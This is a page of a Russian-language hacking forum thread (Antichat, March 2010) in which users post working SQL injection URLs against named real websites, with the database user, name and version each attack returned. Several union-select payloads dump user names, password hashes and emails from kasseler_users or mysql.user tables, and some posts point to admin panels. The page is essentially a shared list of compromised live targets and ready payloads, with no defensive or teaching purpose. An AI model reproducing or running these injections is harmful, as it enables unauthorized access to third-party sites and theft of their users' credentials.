ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11621  
Старый 23.03.2010, 15:04
Аватар для root_sashok
root_sashok
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
Провел на форуме:
8220635

Репутация: 1593


Отправить сообщение для root_sashok с помощью ICQ
По умолчанию

Код:
http://zdrave.bg/popup.php?c=n&id=-1+union+select+concat_ws(0x3a,user(),database(),version()),2,3,4--
Username: rossen_tiabg@localhost
Database: rossen_zdrave
Version: 5.0.86
 
Ответить с цитированием

  #11622  
Старый 23.03.2010, 16:11
Аватар для artel87
artel87
Новичок
Регистрация: 19.01.2010
Сообщений: 4
Провел на форуме:
57109

Репутация: 9
По умолчанию

Код:
http://subaru-club.org/article.asp?ID=161+OR+161=(select%20db_name())&TopicArea=1&ParentID=1
Database: subaru-club
Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2
 
Ответить с цитированием

  #11623  
Старый 23.03.2010, 16:25
Аватар для Strilo4ka
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

Код:
_http://www.jewstars.co.cc/index.php?module=News&do=Category&id=-1+union+select+1,2,3,concat_ws(0x3a,user_name,user_password,user_email),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+kasseler_users--+
Код:
_http://nal-extrim.ru/index.php?module=News&do=Category&id=-1+union+select+1,2,3,concat_ws(0x3a,user_name,user_password,user_email),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+kasseler_users--+
Код:
_http://ottava.info/index.php?module=News&do=Category&id=-1+union+select+1,2,3,concat_ws(0x3a,user_name,user_password,user_email),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+kasseler_users--+
Код:
_http://rap-dvor.ru/index.php?module=News&do=Category&id=-1+union+select+1,2,3,concat_ws(0x3a,user_name,user_password,user_email),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+kasseler_users--+
Код:
_http://6mobil.ru/index.php?module=News&do=Category&id=-1+union+select+1,2,3,concat_ws(0x3a,user_name,user_password,user_email),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+kasseler_users--+
/admin.php

Последний раз редактировалось Strilo4ka; 23.03.2010 в 19:20..
 
Ответить с цитированием

  #11624  
Старый 23.03.2010, 16:32
Аватар для KENTov
KENTov
Новичок
Регистрация: 16.12.2009
Сообщений: 7
Провел на форуме:
103370

Репутация: 16
По умолчанию

Код:
http://www.michaelkenna.net/gallery.php?id=2
Host IP: 69.89.18.101
Web Server: Apache/2.2.15 (CentOS) mod_ssl/2.2.15 0.9.8l DAV/2 mod_auth_passthrough/2.1 FrontPage/5.0.2.2635
Powered-by: PHP/5.2.13
DB Server: MySQL unknown ver
Current DB: michafj0_mkenna



Код HTML:
Target: 		http://www.fairfieldcountylook.com/gallery.php?id=161
Host IP: 74.208.32.200
Web Server: Apache
Powered-by: PHP/4.4.9
DB Server: MySQL >=5
Current DB: db258333454

Последний раз редактировалось KENTov; 23.03.2010 в 16:48..
 
Ответить с цитированием

  #11625  
Старый 23.03.2010, 17:08
Аватар для root_sashok
root_sashok
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
Провел на форуме:
8220635

Репутация: 1593


Отправить сообщение для root_sashok с помощью ICQ
По умолчанию

Код:
http://www.itest.ru/samoactual.php?qnum=-1+union+select+user(),version(),database()--
Username: sociolove@localhost
Database: sociolove
Version: 5.0.26-log

Таблицы не выводит, стоит какая-то защита.

KENTov, в теме нельзя выкладывать инъекции вида "site.ru/index.php?id=1", найди хотя бы количество колонок.

Пример SQL:

Код:
http://www.michaelkenna.net/gallery.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10--

Последний раз редактировалось root_sashok; 23.03.2010 в 18:36..
 
Ответить с цитированием

  #11626  
Старый 23.03.2010, 17:24
Аватар для KENTov
KENTov
Новичок
Регистрация: 16.12.2009
Сообщений: 7
Провел на форуме:
103370

Репутация: 16
По умолчанию

PHP код:
Target:         http://www.snis.ch/news.php?ID=15 
Host IP: 84.16.92.9
Web Server: Apache
DB Server: MySQL >=5
Current DB: swissinternationalstudiesch
 
Ответить с цитированием

  #11627  
Старый 23.03.2010, 18:02
Аватар для попугай
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
http://www.hn-media.net/v3/player.php?id=-255+union+select+1,concat_ws(0x3a,user(),database( ),version()),3,4,5,6,7,8,9--

hn_sql@ouagadougou.dreamhost.com:hn_stream:5.0.89-userstats-log
 
Ответить с цитированием

  #11628  
Старый 23.03.2010, 18:25
Аватар для Strilo4ka
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

PHP код:
_http://www.luxury-auction.org.ua/index.php?module=News&do=Category&id=-1+union+select+1,2,3,concat_ws(0x3a,user_name,user_password,user_email),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+kasseler_users--+ 
/admin.php

Последний раз редактировалось Strilo4ka; 23.03.2010 в 19:19..
 
Ответить с цитированием

  #11629  
Старый 23.03.2010, 18:33
Аватар для -=Razor=-
-=Razor=-
Новичок
Регистрация: 20.12.2008
Сообщений: 24
Провел на форуме:
1187799

Репутация: 62
По умолчанию

Код:
http://www.diplom-service.ru/ds.php?id=-1+union+Select+version()--
Код:
http://www.haradagr-dp.co.jp/ds.php?id=-1+union+select+1,2,3,4,5,6,7,8,version(),10,11,12,13--
Код:
http://www.bsp-abogados.com/noticias/index-de.php?id=-1+union+select+version()--
Код:
http://www.visionodontologia.com.br/dr.php?id=1&pagina=1%27+union+select+1,2,3,passwd,5,6,7,8,9+from+users/*
Код:
http://rolandos-cars-corfu.com/room-order-du.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11+users--

Код:
http://www.propuestasturismo.com.ar/dd.php?id=-4+union+select+1,2,3,4,5,6,7,version()--
 
Ответить с цитированием

  #11630  
Старый 23.03.2010, 18:37
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://www.arts-et-metiers.net/musee.php?P=214&id=278+and+1=0+union+select+1,2,3, 4,concat(user,char(58),password),6,7,8,9,10,11,12, 13,14,15,16,17,18+from+mysql.user--

user() : webuser@localhost

version() : 5.0.44-log

database() : cnam2007
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ